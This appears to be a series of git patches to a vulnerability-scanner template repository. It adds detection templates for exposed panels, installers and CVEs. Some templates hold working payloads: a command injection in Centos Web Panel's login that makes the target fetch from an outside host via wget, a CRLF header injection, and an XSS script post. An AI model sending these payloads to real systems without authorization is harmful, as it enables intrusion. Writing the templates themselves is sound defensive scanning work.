<action@github.com> Date: Fri, 6 Jan 2023 05:47:21 +0000 Subject: [PATCH 0772/1133] Auto Generated New Template Addition List [Fri Jan 6 05:47:21 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d329155e7e..53c7ffd326 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ +exposed-panels/freepbx-administration-panel.yaml exposures/mobiproxy-dashboard.yaml From 0f988a5e7d5e2e97947d16f26a5d06c037ae5ad4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 6 Jan 2023 11:53:41 +0530 Subject: [PATCH 0773/1133] fix --- file/keys/stackhawk-api-key.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/file/keys/stackhawk-api-key.yaml b/file/keys/stackhawk-api-key.yaml index 8a8689eaeb..c2f7b5f6bf 100644 --- a/file/keys/stackhawk-api-key.yaml +++ b/file/keys/stackhawk-api-key.yaml @@ -4,6 +4,10 @@ info: name: StackHawk API Key author: hazana severity: high + reference: + - https://docs.stackhawk.com/apidocs.html + metadata: + verified: "true" tags: token,file file: From aac4284831032fb46ed52b83d92562a9fbc5f888 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 6 Jan 2023 14:04:54 +0530 Subject: [PATCH 0774/1133] update matcher, metadata & filename --- ...mizely-login.yaml => episerver-login.yaml} | 24 +++++++------------ 1 file changed, 8 insertions(+), 16 deletions(-) rename exposed-panels/{optimizely-login.yaml => episerver-login.yaml} (57%) diff --git a/exposed-panels/optimizely-login.yaml b/exposed-panels/episerver-login.yaml similarity index 57% rename from exposed-panels/optimizely-login.yaml rename to exposed-panels/episerver-login.yaml index b71442bb2c..a92533841c 100644 --- a/exposed-panels/optimizely-login.yaml +++ b/exposed-panels/episerver-login.yaml @@ -1,14 +1,15 @@ -id: optimizely-login +id: episerver-login info: - name: Optimizely Admin Panel + name: Episerver Login Panel author: William Söderberg @ WithSecure severity: info description: Optimizely CMS was detected. Optimizely CMS was formerly known as Episerver. reference: - https://docs.developers.optimizely.com/content-cloud/v12.0.0-content-cloud/docs/changing-edit-and-admin-view-urls metadata: - google-query: intext:"When you log in, cookies will be used" + verified: true + shodan-query: html:"epihash" tags: panel,optimizely,episerver requests: @@ -16,21 +17,12 @@ requests: path: - "{{BaseURL}}/episerver/cms" - redirects: true - max-redirects: 1 + matchers-condition: and matchers: - - type: word - words: - - "Util/Login?ReturnUrl=%2Fepiserver%2Fcms" - part: header + - type: regex + regex: + - "Util.*%2fepiserver%2fcms" - type: status status: - 302 - - extractors: - - type: regex - part: body - group: 1 - regex: - - "/EPiServer/Shell/(\\d+\\.\\d+\\.\\d+)/" From babe5313018e96bc7d7a14533caef607ab180cdb Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 6 Jan 2023 14:52:39 +0530 Subject: [PATCH 0775/1133] ImpressPages installation wizard --- .../installer/impresspages-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/installer/impresspages-installer.yaml diff --git a/misconfiguration/installer/impresspages-installer.yaml b/misconfiguration/installer/impresspages-installer.yaml new file mode 100644 index 0000000000..d1700c9c85 --- /dev/null +++ b/misconfiguration/installer/impresspages-installer.yaml @@ -0,0 +1,33 @@ +id: impresspages-installer + +info: + name: ImpressPages Installer + author: pussycat0x + severity: low + metadata: + verified: true + shodan-query: http.title:"ImpressPages installation wizard" + tags: misconfig,exposure,install,impresspages + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ImpressPages installation wizard" + - "Configuration" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file From 435ef768366b00ea7dd4b3018e45617c627845aa Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 6 Jan 2023 15:42:53 +0530 Subject: [PATCH 0776/1133] OrangeHrm Installer --- .../installer/orangehrm-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/installer/orangehrm-installer.yaml diff --git a/misconfiguration/installer/orangehrm-installer.yaml b/misconfiguration/installer/orangehrm-installer.yaml new file mode 100644 index 0000000000..51ce80a849 --- /dev/null +++ b/misconfiguration/installer/orangehrm-installer.yaml @@ -0,0 +1,33 @@ +id: orangehrm-installer + +info: + name: OrangeHrm Installer + author: pussycat0x + severity: high + metadata: + verified: true + shodan-query: http.title:"OrangeHRM Web Installation Wizard" + tags: misconfig,exposure,install,orangehrm + +requests: + - method: GET + path: + - "{{BaseURL}}/installer/installerUI.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "OrangeHRM Web Installation Wizard" + - "admin user creation" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file From 94cde3dd6ebd99983d8012982c8e6db3d15a3571 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 6 Jan 2023 17:27:43 +0530 Subject: [PATCH 0777/1133] rename --- exposed-panels/{episerver-login.yaml => episerver-panel.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/{episerver-login.yaml => episerver-panel.yaml} (97%) diff --git a/exposed-panels/episerver-login.yaml b/exposed-panels/episerver-panel.yaml similarity index 97% rename from exposed-panels/episerver-login.yaml rename to exposed-panels/episerver-panel.yaml index a92533841c..8913bf6ab1 100644 --- a/exposed-panels/episerver-login.yaml +++ b/exposed-panels/episerver-panel.yaml @@ -1,4 +1,4 @@ -id: episerver-login +id: episerver-panel info: name: Episerver Login Panel From a2aa3c9dc219486cf7cad25ea4f1c6bb994ce529 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 6 Jan 2023 12:00:25 +0000 Subject: [PATCH 0778/1133] Auto Generated New Template Addition List [Fri Jan 6 12:00:25 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 53c7ffd326..192737c61a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ +exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml exposures/mobiproxy-dashboard.yaml From e3f0ac32cf6b8ac18ea9f1a6a9bc8d78e6158714 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 6 Jan 2023 12:02:44 +0000 Subject: [PATCH 0779/1133] Auto Generated New Template Addition List [Fri Jan 6 12:02:44 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 192737c61a..db1852e575 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml exposures/mobiproxy-dashboard.yaml +misconfiguration/installer/impresspages-installer.yaml From 6619dadc9598c941dae344be52a27cded81bd7f0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 6 Jan 2023 12:06:37 +0000 Subject: [PATCH 0780/1133] Auto Generated New Template Addition List [Fri Jan 6 12:06:37 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index db1852e575..4975ca9232 100644 --- a/.new-additions +++ b/.new-additions @@ -2,3 +2,4 @@ exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml exposures/mobiproxy-dashboard.yaml misconfiguration/installer/impresspages-installer.yaml +misconfiguration/installer/orangehrm-installer.yaml From 12a5192482540ab58b37f2dd44205e75e24c61da Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 7 Jan 2023 04:02:01 +0000 Subject: [PATCH 0781/1133] Auto WordPress Plugins Update [Sat Jan 7 04:02:01 UTC 2023] :robot: --- technologies/wordpress/plugins/ga-google-analytics.yaml | 2 +- technologies/wordpress/plugins/post-types-order.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/wordpress/plugins/ga-google-analytics.yaml b/technologies/wordpress/plugins/ga-google-analytics.yaml index d811f1b89d..c4ca184a12 100644 --- a/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET diff --git a/technologies/wordpress/plugins/post-types-order.yaml b/technologies/wordpress/plugins/post-types-order.yaml index afe882f9bc..611ca07d07 100644 --- a/technologies/wordpress/plugins/post-types-order.yaml +++ b/technologies/wordpress/plugins/post-types-order.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET From 83b66eac01072d2cc6dafa5b568a3ce925cb5e28 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 7 Jan 2023 04:04:26 +0000 Subject: [PATCH 0782/1133] Auto WordPress Plugins Update [Sat Jan 7 04:04:26 UTC 2023] :robot: --- technologies/wordpress/plugins/ga-google-analytics.yaml | 2 +- technologies/wordpress/plugins/post-types-order.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/wordpress/plugins/ga-google-analytics.yaml b/technologies/wordpress/plugins/ga-google-analytics.yaml index d811f1b89d..c4ca184a12 100644 --- a/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET diff --git a/technologies/wordpress/plugins/post-types-order.yaml b/technologies/wordpress/plugins/post-types-order.yaml index afe882f9bc..611ca07d07 100644 --- a/technologies/wordpress/plugins/post-types-order.yaml +++ b/technologies/wordpress/plugins/post-types-order.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET From 6790f670705828d4627e25ecb7e75e7e05b36f4d Mon Sep 17 00:00:00 2001 From: For3stCo1d <57119052+For3stCo1d@users.noreply.github.com> Date: Sat, 7 Jan 2023 15:01:12 +0800 Subject: [PATCH 0783/1133] Create CVE-2022-44877.yaml --- cves/2022/CVE-2022-44877.yaml | 37 +++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2022/CVE-2022-44877.yaml diff --git a/cves/2022/CVE-2022-44877.yaml b/cves/2022/CVE-2022-44877.yaml new file mode 100644 index 0000000000..5c34d8e7b2 --- /dev/null +++ b/cves/2022/CVE-2022-44877.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-44877 + +info: + name: Centos Web Panel - Unauthenticated Remote Code Execution + author: For3stCo1d + severity: critical + description: | + RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-44877 + - https://github.com/numanturle/CVE-2022-44877 + classification: + cve-id: CVE-2022-44877 + metadata: + shodan-query: http.title:"Login | Control WebPanel" + tags: cve,cve2022,centos,firewall,rce + +requests: + - raw: + - | + POST /login/index.php?login=$(wget${IFS}http://{{interactsh-url}}) HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded + + username=root&password=toor&commit=Login + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 302 From e63973e4f9993db80f1354708a317deb6a411092 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sat, 7 Jan 2023 23:42:21 +0530 Subject: [PATCH 0784/1133] Create phpcli-stack-trace.yaml --- misconfiguration/phpcli-stack-trace.yaml | 33 ++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/phpcli-stack-trace.yaml diff --git a/misconfiguration/phpcli-stack-trace.yaml b/misconfiguration/phpcli-stack-trace.yaml new file mode 100644 index 0000000000..8e5a0b2f70 --- /dev/null +++ b/misconfiguration/phpcli-stack-trace.yaml @@ -0,0 +1,33 @@ +id: phpcli-stack-trace + +info: + name: PHP CLI Server Stack Trace + author: DhiyaneshDk + severity: info + metadata: + verified: true + shodan-query: The requested resource <code class="url"> + tags: misconfig,phpcli + +requests: + - method: GET + path: + - '{{BaseURL}}/{{randstr}}.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'The requested resource <code class="url">/{{randstr}}.php</code> was not found on this server' + - '404 Not Found' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 404 From 09504ab4274c8d8fe45121ef2038c4405cdfd14a Mon Sep 17 00:00:00 2001 From: Emre Kara <74061558+emrekara369@users.noreply.github.com> Date: Sat, 7 Jan 2023 22:00:41 +0300 Subject: [PATCH 0785/1133] Wrong part name (#6482) Part name should be "header" instead "location" --- vulnerabilities/generic/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index db9efe618a..43a6ea4877 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -114,7 +114,7 @@ requests: matchers-condition: and matchers: - type: regex - part: location + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 From 6f409e93f8dbbddbde12a1093e0037559d9efc68 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 8 Jan 2023 08:11:33 +0900 Subject: [PATCH 0787/1133] Create CVE-2018-16979.yaml --- CVE-2018-16979.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 CVE-2018-16979.yaml diff --git a/CVE-2018-16979.yaml b/CVE-2018-16979.yaml new file mode 100644 index 0000000000..1aa1bc4c59 --- /dev/null +++ b/CVE-2018-16979.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-16979 + +info: + name: Monstra CMS V3.0.4 - HTTP header injection + author: 0x_Akoko + severity: medium + description: Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. + reference: + - https://vuldb.com/?id.123966 + - https://www.cvedetails.com/cve/CVE-2018-16979 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-16979 + cwe-id: CWE-113 + tags: cve,cve2018,crlf,mostracms + +requests: + - method: GET + path: + - "{{BaseURL}}/monstra-master/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' From 046de6f3b5364624d9c3674f00fde4fb185f383c Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 8 Jan 2023 08:18:21 +0900 Subject: [PATCH 0788/1133] Update CVE-2018-16979.yaml --- CVE-2018-16979.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/CVE-2018-16979.yaml b/CVE-2018-16979.yaml index 1aa1bc4c59..544220bbe7 100644 --- a/CVE-2018-16979.yaml +++ b/CVE-2018-16979.yaml @@ -19,7 +19,6 @@ requests: - method: GET path: - "{{BaseURL}}/monstra-master/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1" - matchers: - type: regex part: header From 579c3c97962ba1e58ce495a458fe78379c195c20 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 8 Jan 2023 20:56:05 +0530 Subject: [PATCH 0789/1133] Added HashiCorp Consul / Enterprise - Server Side Request Forgery Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com> --- cves/2022/CVE-2022-29153.yaml | 50 +++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 cves/2022/CVE-2022-29153.yaml diff --git a/cves/2022/CVE-2022-29153.yaml b/cves/2022/CVE-2022-29153.yaml new file mode 100644 index 0000000000..23ca2c679b --- /dev/null +++ b/cves/2022/CVE-2022-29153.yaml @@ -0,0 +1,50 @@ +id: CVE-2022-29153 + +info: + name: HashiCorp Consul / Enterprise - Server Side Request Forgery + author: c-sh0 + severity: high + description: HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and + 1.11.4 may allow server side request forgery when the Consul client agent + follows redirects returned by HTTP health check endpoints. Consul follows + HTTP redirects by default. HTTP + Interval health check configuration now + provides a disable_redirects option to prohibit this behavior. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-29153 + - https://discuss.hashicorp.com/t/hcsec-2022-10-consul-s-http-health-check-may-allow-server-side-request-forgery/38393 + - https://github.com/hashicorp/consul/pull/12685 + - https://developer.hashicorp.com/consul/docs/discovery/checks + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2022-29153 + cwe-id: CWE-918 + tags: cve,cve2022,consul,ssrf,hashicorp + +requests: + - raw: + - | + PUT {{BaseURL}}/v1/agent/check/register HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "id": "{{randstr}}", + "name": "{{randstr}}", + "method": "GET", + "http": "/dev/null", + "interval": "10s", + "timeout": "1s", + "disable_redirects": true + } + + matchers-condition: and + matchers: + - type: status + status: + - 400 + + - type: word + part: body + words: + - unknown field "disable_redirects" \ No newline at end of file From 70650511d41a7769f2e34331603af2818bbe68ed Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 8 Jan 2023 20:56:23 +0530 Subject: [PATCH 0790/1133] Create monstra-installer.yaml --- .../installer/monstra-installer.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 misconfiguration/installer/monstra-installer.yaml diff --git a/misconfiguration/installer/monstra-installer.yaml b/misconfiguration/installer/monstra-installer.yaml new file mode 100644 index 0000000000..0c2b5dbe04 --- /dev/null +++ b/misconfiguration/installer/monstra-installer.yaml @@ -0,0 +1,26 @@ +id: monstra-installer + +info: + name: Monstra Installation Exposure + author: ritikchaddha + severity: high + metadata: + verified: true + shodan-query: 'title:"Monstra :: Install"' + tags: misconfig,monstra,install + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Monstra :: Install" + + - type: status + status: + - 200 From 7e157b54b60d113b7158850c2291c206834692b7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 8 Jan 2023 21:13:00 +0530 Subject: [PATCH 0791/1133] template update and added metadata --- cves/2022/CVE-2022-29153.yaml | 31 ++++++++++++++----------------- 1 file changed, 14 insertions(+), 17 deletions(-) diff --git a/cves/2022/CVE-2022-29153.yaml b/cves/2022/CVE-2022-29153.yaml index 23ca2c679b..4a241cdc17 100644 --- a/cves/2022/CVE-2022-29153.yaml +++ b/cves/2022/CVE-2022-29153.yaml @@ -1,30 +1,27 @@ id: CVE-2022-29153 info: - name: HashiCorp Consul / Enterprise - Server Side Request Forgery + name: HashiCorp Consul/Enterprise - Server Side Request Forgery author: c-sh0 severity: high - description: HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and - 1.11.4 may allow server side request forgery when the Consul client agent - follows redirects returned by HTTP health check endpoints. Consul follows - HTTP redirects by default. HTTP + Interval health check configuration now - provides a disable_redirects option to prohibit this behavior. + description: | + HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and 1.11.4 may allow server side request forgery when the Consul client agent follows redirects returned by HTTP health check endpoints. Consul follows HTTP redirects by default. HTTP + Interval health check configuration now provides a disable_redirects option to prohibit this behavior. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-29153 - https://discuss.hashicorp.com/t/hcsec-2022-10-consul-s-http-health-check-may-allow-server-side-request-forgery/38393 - https://github.com/hashicorp/consul/pull/12685 - https://developer.hashicorp.com/consul/docs/discovery/checks + - https://nvd.nist.gov/vuln/detail/CVE-2022-29153 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - cvss-score: 7.5 cve-id: CVE-2022-29153 - cwe-id: CWE-918 - tags: cve,cve2022,consul,ssrf,hashicorp + metadata: + verified: true + shodan-query: title:"Consul by HashiCorp" + tags: cve,cve2022,consul,hashicorp,ssrf requests: - raw: - | - PUT {{BaseURL}}/v1/agent/check/register HTTP/1.1 + PUT /v1/agent/check/register HTTP/1.1 Host: {{Hostname}} Content-Type: application/json @@ -40,11 +37,11 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 400 - - type: word part: body words: - - unknown field "disable_redirects" \ No newline at end of file + - unknown field "disable_redirects" + + - type: status + status: + - 400 From e9b5b2748a9ecabe87188ca61493e3a7a27d7672 Mon Sep 17 00:00:00 2001 From: LIL NIX <ebsa491@gmail.com> Date: Sun, 8 Jan 2023 19:38:33 +0330 Subject: [PATCH 0792/1133] Updating old-copyright.yaml for 2023 --- miscellaneous/old-copyright.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/old-copyright.yaml b/miscellaneous/old-copyright.yaml index af43c520e4..c2eb3a76f2 100644 --- a/miscellaneous/old-copyright.yaml +++ b/miscellaneous/old-copyright.yaml @@ -18,7 +18,7 @@ requests: - type: word part: body words: - - '2022' + - '2023' negative: true - type: regex From 01c637375c6da69ae043195ada058b55aa201ed9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 8 Jan 2023 22:30:33 +0530 Subject: [PATCH 0793/1133] Update and rename CVE-2018-16979.yaml to cves/2018/CVE-2018-16979.yaml --- CVE-2018-16979.yaml | 26 -------------------------- cves/2018/CVE-2018-16979.yaml | 34 ++++++++++++++++++++++++++++++++++ 2 files changed, 34 insertions(+), 26 deletions(-) delete mode 100644 CVE-2018-16979.yaml create mode 100644 cves/2018/CVE-2018-16979.yaml diff --git a/CVE-2018-16979.yaml b/CVE-2018-16979.yaml deleted file mode 100644 index 544220bbe7..0000000000 --- a/CVE-2018-16979.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2018-16979 - -info: - name: Monstra CMS V3.0.4 - HTTP header injection - author: 0x_Akoko - severity: medium - description: Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. - reference: - - https://vuldb.com/?id.123966 - - https://www.cvedetails.com/cve/CVE-2018-16979 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-16979 - cwe-id: CWE-113 - tags: cve,cve2018,crlf,mostracms - -requests: - - method: GET - path: - - "{{BaseURL}}/monstra-master/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1" - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' diff --git a/cves/2018/CVE-2018-16979.yaml b/cves/2018/CVE-2018-16979.yaml new file mode 100644 index 0000000000..d97874d556 --- /dev/null +++ b/cves/2018/CVE-2018-16979.yaml @@ -0,0 +1,34 @@ +id: CVE-2018-16979 + +info: + name: Monstra CMS V3.0.4 - HTTP Header Injection + author: 0x_Akoko + severity: medium + description: | + Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. + reference: + - https://github.com/howchen/howchen/issues/4 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16979 + classification: + cve-id: CVE-2018-16979 + metadata: + verified: true + tags: cve,cve2018,crlf,mostra,mostracms,cms + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'new line detected in' + - 'cryptographp.php' + condition: and + + - type: status + status: + - 200 From a5a2255ea8774d38989f754953ee85745db232a2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sun, 8 Jan 2023 22:42:25 +0530 Subject: [PATCH 0794/1133] Create default-cakephp-page.yaml --- technologies/default-cakephp-page.yaml | 28 ++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 technologies/default-cakephp-page.yaml diff --git a/technologies/default-cakephp-page.yaml b/technologies/default-cakephp-page.yaml new file mode 100644 index 0000000000..2959666f4f --- /dev/null +++ b/technologies/default-cakephp-page.yaml @@ -0,0 +1,28 @@ +id: default-cakephp-page + +info: + name: CakePHP Default Page + author: DhiyaneshDK + severity: info + metadata: + verified: true + shodan-query: html:"Welcome to CakePHP" + tags: tech,cakephp,default-page + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome to CakePHP' + - 'the rapid development PHP framework:' + condition: and + + - type: status + status: + - 200 From beb733848dea99caaf375c73f010a52451e8f045 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 9 Jan 2023 04:02:24 +0000 Subject: [PATCH 0795/1133] Auto WordPress Plugins Update [Mon Jan 9 04:02:24 UTC 2023] :robot: --- helpers/wordpress/plugins/wp-statistics.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index c985b8dd6e..1f47cd8969 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -13.2.11 \ No newline at end of file +13.2.12 \ No newline at end of file From 2be6152ebcbf9ad6b1466579892e2a347a82aed4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 9 Jan 2023 04:07:43 +0000 Subject: [PATCH 0796/1133] Auto WordPress Plugins Update [Mon Jan 9 04:07:43 UTC 2023] :robot: --- helpers/wordpress/plugins/wp-statistics.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index c985b8dd6e..1f47cd8969 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -13.2.11 \ No newline at end of file +13.2.12 \ No newline at end of file From 8d17d7712fb6bf6354394282b1694b4f17e8fb0b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 9 Jan 2023 11:17:56 +0530 Subject: [PATCH 0797/1133] Create CVE-2018-11473.yaml --- cves/2018/CVE-2018-11473.yaml | 59 +++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 cves/2018/CVE-2018-11473.yaml diff --git a/cves/2018/CVE-2018-11473.yaml b/cves/2018/CVE-2018-11473.yaml new file mode 100644 index 0000000000..aa117dc491 --- /dev/null +++ b/cves/2018/CVE-2018-11473.yaml @@ -0,0 +1,59 @@ +id: CVE-2018-11473 + +info: + name: Monstra CMS V3.0.4 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Monstra CMS 3.0.4 has XSS in the registration Form (i.e., the login parameter to users/registration). + reference: + - https://github.com/monstra-cms/monstra/issues/446 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11473 + classification: + cve-id: CVE-2018-11473 + metadata: + verified: true + tags: cve,cve2018,xss,mostra,mostracms,cms + +requests: + - raw: + - | + GET /users/registration HTTP/1.1 + Host: {{Hostname}} + + - | + POST /users/registration HTTP/1.1 + Host: {{Hostname}} + Origin: http://192.168.1.17 + Content-Type: application/x-www-form-urlencoded + + csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "><script>alert(document.domain)</script>" + - "Monstra" + condition: and + case-insensitive: true + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'id="csrf" name="csrf" value="(.*)">' + internal: true From 816ed32ba7ea95da707988d4e4235e70fabe5349 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha 